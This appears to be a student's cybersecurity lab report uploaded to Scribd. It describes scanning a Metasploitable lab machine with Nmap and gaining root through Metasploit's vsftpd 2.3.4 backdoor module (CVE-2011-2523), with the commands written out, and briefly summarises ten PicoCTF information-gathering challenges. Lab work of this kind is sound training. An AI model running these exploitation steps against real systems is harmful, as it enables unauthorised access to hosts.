Scribd
Upload
10 views

Bruce Kamugisha Assignment 2 (Personal) Week2

Uploaded by

brucemalloy36
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
10 views

Bruce Kamugisha Assignment 2 (Personal) Week2

Uploaded by

brucemalloy36
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Cybersecurity Lab Report

Objective
The objective of this lab was to perform a penetration test on a vulnerable
machine (Metasploitable) from an attacker machine (Kali Linux), using the
Metasploit framework. The tasks included identifying IP addresses, scanning for
open ports, discovering vulnerabilities using Nmap, and exploiting the
vulnerable machine using CVE20112523.

Steps Taken
Networking Setup:
Ensured both Kali Linux (attacker) and Metasploitable (victim) machines
were connected to the same NAT network, allowing them to communicate
directly.

IP Address Identification:
Attacker Machine (Kali Linux) IP: 192.168.100.21
Victim Machine (Metasploitable) IP: 192.168.100.22

Port Scanning with Nmap:


Used Nmap to scan for open ports and running services on the victim
machine:
Command: `nmap sV 192.168.100.22
Discovered the following open ports and services:
vsftpd port234
Vulnerability Scanning with Nmap:
Used the Nmap vulnerability engine to identify vulnerable services on the
victim machine:
Command: `nmap –script vuln 192.168.100.22
Discovered vulnerabilities:
CVE20112523 (vsftpd backdoor vulnerability)

Exploitation Using Metasploit:


Loaded Metasploit and exploited the CVE20112523 vulnerability to gain root
access to the Metasploitable machine:
- Command:
```bash
Msfconsole
Use exploit/unix/ftp/vsftpd_234_backdoor
Set RHOST 192.168.100.22
Run
```
Gained root access to the victim machine.
Root Access Confirmation:
Successfully gained root access as evidenced by the following screenshot
Challenges Faced
One of the main challenges I encountered was understanding the importance of
ensuring both machines were on the same network. Initially, I had trouble
establishing communication between the attacker and victim machines because
they were on different networks. This issue highlighted the importance of
networking configuration in penetration testing labs.

PicoCTF Challenges
Objective
The goal of these challenges was to perform information gathering by solving
various Capture the Flag (CTF) puzzles. I completed 10 challenges, each
involving different methods of gathering or analyzing data to find hidden
"flags."
Challenges Overview

1. Information (Easy)
Objective: Basic information gathering, likely involving inspecting basic file
properties.
Approach: Used basic commands to find hidden information or clues within
given files
Solution: Found the hidden flag after analyzing the file.

2. Insp3ct0r (Easy)
Objective: Inspect the HTML of a web page to find clues or flags.
Approach: Used browser developer tools to explore the HTML structure.
Solution: Found the flag hidden within the HTML comments.

3. Inspect HTML (Easy)


Objective: Similar to Insp3ct0r, this involved digging through the web page’s
source code.
Approach: Examined the source code for hidden elements or embedded data.
Solution: Successfully retrieved the flag by inspecting the page elements.

4. Obedient Cat (Easy)


Objective: This challenge likely involved basic commandline interaction to
retrieve a file or flag.
Approach: Used common terminal commands like `cat` to display file
contents.
Solution: Retrieved the flag by reading the file contents.
5. Scavenger Hunt (Easy)
Objective: Navigate through various locations, files, or clues to find a hidden
flag.
Approach: Followed a sequence of hints or clues provided within files or
directories.
Solution: Located the final flag after collecting information from multiple
sources.

6. Where Are the Robots (Easy)


Objective: Explore robots.txt files on websites to discover restricted areas.
Approach: Accessed the robots.txt file of a given website to identify hidden
directories.
Solution: Found the flag within a disallowed directory.

7. Chrono (Medium)
Objective: Likely involved timebased or encoded data that needed to be
analyzed.
Approach: Used timerelated clues and possibly scripting tools to decode or
extract the flag.
Solution: Successfully decoded the flag by understanding and manipulating
the time data.

8. Secrets (Medium)
Objective: Identify hidden secrets, possibly in metadata or hidden fields.
Approach: Used tools like strings or metadata inspection tools to uncover
hidden data.
Solution: Found the flag embedded within the hidden data.

9. Vigenere (Medium)
Objective: Solve a cipher, specifically the Vigenère cipher.
Approach: Applied the Vigenère cipher decryption technique to the given
encoded message.
Solution: Decoded the message and retrieved the flag.

10. Wireshark doo dooo do doo... (Medium)


Objective: Analyse network traffic, likely using Wireshark, to extract
information.
Approach: Loaded the provided pcap file in Wireshark, identified key data
packets, and decoded the traffic.
Solution: Found the flag hidden in the packet data.

Challenges Faced
Understanding some of the encryption methods like the Vigenère cipher took
additional time, as it required manual key identification.
Some challenges required careful inspection of metadata, which was easy to
overlook at first.

You might also like